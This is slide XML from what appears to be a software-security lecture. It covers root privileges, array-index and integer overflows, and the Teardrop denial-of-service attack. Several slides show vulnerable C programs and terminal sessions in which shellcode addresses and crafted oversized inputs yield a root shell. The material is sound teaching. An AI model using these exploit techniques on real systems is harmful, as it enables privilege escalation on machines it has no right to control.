            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The root account is the administrative account (UID 0) and has special privileges (aka, superuser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The root user can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Access all the system resources (files, network, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Modify the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Become any other user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Users are listed in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Encrypted passwords are listed in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/shadow</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r>
              <a:rPr lang="en-US"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt;                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt;                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>                                           </a:t>
            </a:r>
          </a:p>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array[8];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index;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value;                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  index = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strtol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1], NULL, 10); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  value = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strtoul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[2], NULL, 16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  array[index] = value;                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>egg_create</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> is at 0xbffff5fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>arrayoverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 11 0xbffff5fe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2872102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Always check that array indexes that can be controlled by user input are within the array’s bounds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32381973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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows are caused by unexpected results when comparing, casting, and adding integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>short x = 0x7FFF; x++; /* x is now -32768 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unsigned short x = 0xFFFF; x++ /* x is now 0 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unsigned long l; short x = -2; l = x; /* l is now 4294967294 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36296733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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[512];                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  long max;                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;                                                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  max = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a: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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1]);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("max %d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> %d\n", max, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt; max) {                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1]);                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }                                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24842197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1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213443" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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"A" * 32000'`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32000                                                               </a:t>
            </a:r>
          </a:p>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"A" * 33000'`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-32536                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>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"\x58\xf4\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>" * 9000'`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-29536                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#                                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22244254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dirty="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Denial-of-service attack that exploits a bug in the fragment reassembling routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is the number of bytes copied so far </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skb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is the total size of the datagram (after reassembly)</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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>is the memory buffer where the datagram is being reassembled</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>qp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;fragments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>is the linked list of fragments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</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fp</a:t>
            </a:r>
            <a:r>
